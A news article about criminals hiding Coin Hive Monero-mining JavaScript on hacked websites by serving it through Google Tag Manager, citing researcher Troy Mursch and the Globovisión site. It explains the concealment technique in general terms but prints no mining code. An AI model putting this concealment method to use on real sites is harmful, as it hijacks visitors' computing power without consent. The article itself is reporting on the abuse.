Crypto-jackers enlist Google Tag Manager to smuggle alt-coin miners

Ad giant has malware detection in its script-hosting service... but Coin Hive isn't flagged

Crypto-jackers using Coin Hive code to secretly mine Monero via computing power supplied by the unsuspecting have found Google Tag Manager to be a convenient means of distribution.

Security researcher Troy Mursch told The Register that he recently found Coin Hive's free-to-use JavaScript running on the Globovisión website – Globovisión being a 24-hour telly station for Venezuela and Latin America.

The code was invisibly spawned, he said, "from the embedded Google Tag Manager script

Google Tag Manager allows marketers, or anyone else with a website, to create code – dubbed a tag – that can be placed in webpages to dynamically inject JavaScript snippets rather than using hardcoded JavaScript in those files.

Google's service, handily enough, provides more control and flexibility than static code delivery.

Because the code gets served by Google Tag Manager, it's not present in the source files on a web server. The JavaScript file and appended parameter gtm.js?id=GTM-KCDXG2D don't say anything about the function of the code invoked. Essentially, miscreants are hacking websites and quietly adding Google-hosted tags that contain the malicious code-mining code, thus obfuscating the source of the scripts.

Mursch said the Globovisión mining code was removed within an hour of discovery, and it's not clear how it got there. He found the Monero-crafting JS, he said, while reviewing another crypto-jacking incident with a Brazilian singer's website.

Google did not immediately respond to a request for comment.

A month ago, when The Register reported that Google short URLs were being co-opted for Monero, there were about 113,000 instances of cryptonight mining. Presently, there are about 180,000.

The Chocolate Factory's Tag Manager Terms of Service prohibits misuse, and the ad distribution biz has systems in place to look for malware in tags and prevent them from firing when found.

"In most cases, affected users are unaware that there are tags serving malware from their containers," the web giant explained on its website. "Usually through no fault of your own, a network provider becomes malware infected when they install 3rd party libraries or templates onto their websites, and subsequently transmit that malware to your site via the custom HTML tag that you published onto your website via Tag Manager."

That being the case, it appears that Google either cannot detect Coin Hive code through Tag Manager or it doesn't consider it to be malicious. Most ad blockers, as well as antivirus tools, kill Coin Hive's code on sight these days.

Coin Hive's development team did not respond to a request for comment.

Noting that crypto-jacking tops Malwarebytes' list of security ills likely to be visited upon businesses and consumers in 2018, Mursch said: "We should expect this trend to continue." ?

Biting the hand that feeds IT ? 1998–2017

<option id="haujiCA"></option>
<tr id="haujiCA"><optgroup id="haujiCA"></optgroup></tr>
<tr id="haujiCA"><optgroup id="haujiCA"></optgroup></tr>
<acronym id="haujiCA"><small id="haujiCA"></small></acronym><tr id="haujiCA"><optgroup id="haujiCA"></optgroup></tr>
<acronym id="haujiCA"></acronym><acronym id="haujiCA"></acronym><rt id="haujiCA"></rt>
<acronym id="haujiCA"><optgroup id="haujiCA"></optgroup></acronym>
<acronym id="haujiCA"></acronym>
<tr id="haujiCA"><optgroup id="haujiCA"></optgroup></tr>
<rt id="haujiCA"></rt>
  • 325735831 2018-01-17
  • 162536830 2018-01-17
  • 48476829 2018-01-17
  • 804110828 2018-01-17
  • 74358827 2018-01-17
  • 613608826 2018-01-17
  • 955358825 2018-01-17
  • 318587824 2018-01-17
  • 196263823 2018-01-17
  • 409554822 2018-01-17
  • 765918821 2018-01-17
  • 179475820 2018-01-17
  • 49709819 2018-01-17
  • 376285818 2018-01-17
  • 299958817 2018-01-17
  • 686135816 2018-01-17
  • 197409815 2018-01-17
  • 734421814 2018-01-17
  • 33320813 2018-01-17
  • 159501812 2018-01-17